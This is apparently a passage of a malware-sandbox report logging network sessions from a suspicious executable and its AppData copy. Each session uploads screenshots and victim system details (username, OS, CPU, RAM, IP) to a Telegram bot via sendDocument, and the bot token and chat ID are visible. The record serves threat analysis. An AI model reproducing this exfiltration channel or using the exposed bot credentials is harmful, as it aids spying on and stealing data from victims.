                                                                  2024-04-19 17:34:58 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 65 36 35 34 64 37 38 34 31 38 65 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc6e654d78418e--
                                                                  2024-04-19 17:34:58 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:34:59 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:34:59 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3436,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548099,"document":{"file_name":"user-618321 2024-05-07 07-14-15.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1sZiKrQ-jztWjz1OxDzTwEJ1W0Si4AArAXAAKLUhlRb2ciH4LIkj8BAAdtAAM0BA","file_unique_id":"AQADsBcAAotSGVFy","file_size":12508,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1sZiKrQ-jztWjz1OxDzTwEJ1W0Si4AArAXAAKLUhlRb2ciH4LIkj8BAAdtAAM0BA","file_unique_id":"AQADsBcAAotSGVFy","file_size":12508,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINbGYiq0Po87Vo89TsQ808BCdVtEouAAKwFwACi1IZUW9nIh-CyJI_NAQ","file_unique_id":"AgADsBcAAotSGVE","file_size":66521},"caption":"New SC Recovered!\n\nTime: 05/07/2024 07:09:11\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.549721149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:35:07 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc71aad670e85b
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67155
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:35:08 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 31 61 61 64 36 37 30 65 38 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 31 61 61 64 36 37 30 65 38 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 31 2f 32 30 32 34 20 31 31 3a 30 39 3a 33 33 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc71aad670e85bContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc71aad670e85bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/11/2024 11:09:33User
                                                                  2024-04-19 17:35:08 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:35:08 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:35:08 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:35:08 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:35:08 UTC1569OUTData Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
                                                                  Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
                                                                  2024-04-19 17:35:08 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 31 61 61 64 36 37 30 65 38 35 62 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc71aad670e85b--
                                                                  2024-04-19 17:35:08 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:35:09 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:35:09 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3438,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548109,"document":{"file_name":"user-618321 2024-05-11 11-09-33.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1uZiKrTDFvh8_l5fEgKcZUi_MVXiUAArEXAAKLUhlRSljehnrr2_YBAAdtAAM0BA","file_unique_id":"AQADsRcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1uZiKrTDFvh8_l5fEgKcZUi_MVXiUAArEXAAKLUhlRSljehnrr2_YBAAdtAAM0BA","file_unique_id":"AQADsRcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINbmYiq0wxb4fP5eXxICnGVIvzFV4lAAKxFwACi1IZUUpY3oZ669v2NAQ","file_unique_id":"AgADsRcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/11/2024 11:09:33\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.549722149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:35:10 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc74196518f1dd
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67155
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:35:11 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 34 31 39 36 35 31 38 66 31 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 34 31 39 36 35 31 38 66 31 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 34 2f 32 30 32 34 20 31 33 3a 32 35 3a 35 37 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc74196518f1ddContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc74196518f1ddContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/14/2024 13:25:57User
                                                                  2024-04-19 17:35:11 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:35:11 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:35:11 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:35:11 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:35:11 UTC1569OUTData Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
                                                                  Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
                                                                  2024-04-19 17:35:11 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 34 31 39 36 35 31 38 66 31 64 64 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc74196518f1dd--
                                                                  2024-04-19 17:35:11 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:35:12 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:35:12 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3439,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548112,"document":{"file_name":"user-618321 2024-05-14 13-25-59.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1vZiKrT5PtETgHv09Qiq16ih1NgUAAArIXAAKLUhlR0i3QAXUk-8oBAAdtAAM0BA","file_unique_id":"AQADshcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1vZiKrT5PtETgHv09Qiq16ih1NgUAAArIXAAKLUhlR0i3QAXUk-8oBAAdtAAM0BA","file_unique_id":"AQADshcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINb2Yiq0-T7RE4B79PUIqteoodTYFAAAKyFwACi1IZUdIt0AF1JPvKNAQ","file_unique_id":"AgADshcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/14/2024 13:25:57\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.549723149.154.167.2204437324C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:35:17 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc6a4172022d82
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67155
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:35:17 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 61 34 31 37 32 30 32 32 64 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 61 34 31 37 32 30 32 32 64 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 30 32 2f 32 30 32 34 20 30 30 3a 34 32 3a 32 39 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc6a4172022d82Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc6a4172022d82Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/02/2024 00:42:29User
                                                                  2024-04-19 17:35:17 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
